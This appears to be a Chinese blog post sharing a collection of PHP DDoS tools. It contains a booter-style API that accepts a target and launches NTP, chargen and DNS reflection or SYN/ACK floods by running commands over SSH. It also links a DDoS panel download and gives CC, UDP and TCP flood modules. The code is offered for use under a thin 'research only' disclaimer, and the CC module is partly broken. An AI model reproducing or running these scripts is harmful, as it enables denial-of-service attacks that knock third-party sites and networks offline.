PHP DDoS脚本集合发布{持续更新}


一.PHP DDOS网页端反射攻击的API源码,接口请求地址如下图。

pic_uc_1492013850967.jpg

源码如下:

<?phpignore_user_abort(true);set_time_limit(1000);$server_ip = "1.3.3.7"; //ip  $server_pass = "aeys"; //密码  $server_user = "root"; //账号  $key = $_GET['key'];$host = $_GET['host'];$port = intval($_GET['port']);$time = intval($_GET['time']);$method = $_GET['method'];$action = $_GET['action'];$array = array("ntp","chargen","dns","syn","ack");$ray = array("aeys"); //keyif (!empty($key)){}else{die('Error: API key is empty!');}if (in_array($key, $ray)){}else{die('Error: Incorrect API key!');}if (!empty($time)){}else{die('Error: time is empty!');}if (!empty($host)){}else{die('Error: Host is empty!');}if (!empty($method)){}else{die('Error: Method is empty!');}if (in_array($method, $array)){}else{die('Error: The method you requested does not exist!');}if ($port > 44405){die('Error: Ports over 44405 do not exist');}   if ($time > 1000){die('Error: Cannot exceed 1000 seconds!');}  if(ctype_digit($Time)){die('Error: Time is not in numeric form!');}if(ctype_digit($Port)){die('Error: Port is not in numeric form!');}if ($method == "dns") { $command = "/path/to/dns $host $port /path/to/d.txt 2 -1 $time"; } //攻击脚本、反射文件目录,攻击命令if ($method == "chargen") { $command = "/path/to/chargen $host $port /path/to/c.txt 2 -1 $time"; }if ($method == "ntp") { $command = "/path/to/ntp $host $port /path/to/n.txt 2 -1 $time"; }if ($method == "ack") { $command = "/path/to/gem -T0 -h $host -t $time"; }if ($method == "syn") { $command = "/path/to/gem -T3 -h $host -t $time"; }if ($action == "stop") { $command = "pkill $host -f"; }if (!function_exists("ssh2_connect")) die("Error: SSH2 does not exist on you're server");if(!($con = ssh2_connect($server_ip, 22))){  echo "Error: Connection Issue";} else {    if(!ssh2_auth_password($con, $server_user, $server_pass)) {    echo "Error: Login failed, one or more of you're server credentials are incorrect.";    } else {            if (!($stream = ssh2_exec($con, $command ))) {            echo "Error: You're server was not able to execute you're methods file and or its dependencies";        } else {                stream_set_blocking($stream, false);            $data = "";            while ($buf = fread($stream,4096)) {                $data .= $buf;            }            echo "Attack started!!</br>Hitting: $host</br>On Port: $port </br>Attack Length: $time</br>With: $method";            fclose($stream);        }    }}?>

API 服务器需要安装SSH2扩展库


二.DDOS网页版平台PHP源码,目前最流行的平台源码

pic_uc_1492014614912.jpg

网盘下载:http://pan.lanzou.com/x/902579

三.各种模块分散聚合

①CC模块

<?phpecho "状态 : 正常运行中.....<br>";echo "================================================<br>";echo "  <font color=blue>www.phpddos.com<br>";echo "  CC Flood 模块<br>";echo "  作者:ybhacker<br>";echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";echo "================================================<br><br>";error_reporting(E_ALL);  //提示错误信息set_time_limit(0);     //设定一个程式所允许执行的秒数   0 是无限循环ob_implicit_flush();     // 刷新输出缓冲$address = $_POST['site'];  // 网站地址$port = $_POST['port'];      // 端口$dongu = $_POST['dongu'];   //循环次数$sayi = 1;   while ( $sayi <= $dongu )   //变量asyi小于 循环次数变量 dongu 才会继续循环{    if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {        echo "HaHa\n";    }    if (socket_bind($sock, $address, $port) === false) {       // 连接端口        echo "HaHa\n";    }    if (socket_listen($sock, 5) === false) {        echo "HaHa\n";    }        $msg = "HTTP/1.1 GET /\r\nHost:"+$_GET['site']+"\r\nConnection: Keep-Alive\r\n";        socket_write($msg);        socket_close($sock);        $sayi++;   // 循环一次 变量sayi 加1        echo "Goodbye...".$sayi;   // 输出循环次数}?>


②UDP攻击模块

<?php$packets = 0;$ip = $_GET['ip'];$port = $_GET['port'];set_time_limit(0);ignore_user_abort(FALSE);$exec_time = $_GET['time'];$time = time();print "状态 : 正常运行中.....<br>";$max_time = $time+$exec_time;for($i=0;$i<65535;$i++){        $out .= "phpddos";}while(1){$packets++;        if(time() > $max_time){                break;        }        $fp = fsockopen("udp://$ip", $port, $errno, $errstr, 5);        if($fp){                fwrite($fp, $out);                fclose($fp);        }}echo "================================================<br>";echo "  <font color=blue>www.phpddos.com<br>";echo "  作者:ybhacker<br>";echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";echo "================================================<br><br>";echo "  攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";echo "    攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";echo "  攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>

③TCP攻击模块

<?phpini_set("display_errors", "Off");$packets = 0;$ip = $_GET['ip'];$port = $_GET['port'];set_time_limit(0);ignore_user_abort(FALSE);$exec_time = $_GET['time'];$time = time();print "状态 : 正常运行中.....<br>";$max_time = $time+$exec_time;while(1){$packets++;        if(time() > $max_time){                break;        }        $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);}echo "================================================<br>";echo "  <font color=blue>www.phpddos.com<br>";echo "  SYN Flood 模块<br>";echo "  作者:ybhacker<br>";echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";echo "================================================<br><br>";echo "  攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";echo "    攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";echo "  攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>

后续会在收集并整理好相关DDoS的PHP脚本源码后分享

Leave a Comment